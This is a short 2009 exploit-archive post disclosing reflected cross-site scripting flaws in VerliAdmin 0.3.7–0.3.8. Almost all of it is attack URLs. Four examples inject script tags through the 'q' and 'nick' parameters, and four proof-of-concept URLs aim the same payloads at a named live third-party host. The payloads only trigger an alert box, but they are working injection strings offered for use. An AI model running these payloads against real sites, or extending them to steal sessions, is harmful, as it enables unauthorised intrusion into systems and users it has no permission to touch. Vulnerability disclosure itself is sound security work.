verliadmin-xss.txt

Posted on 06 May 2009
VerliAdmin-  v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities

http://bohyn.czechweb.cz

- 5-05-2009

- Methodman - http://nemesis.te-home.net

-Example:

http//:verliadmin.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>

http//:verliadmin.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>

http//:verliadmin.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>

http//:verliadmin.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>


-Proof of Concept:


http://alfa.hub.lv/alfa/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>

http://alfa.hub.lv/alfa/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>

http://alfa.hub.lv/alfa/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>

http://alfa.hub.lv/alfa/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>


/teamelite 2009
TOP
Malware :

None in database
Last 20
Exploits :

Last 20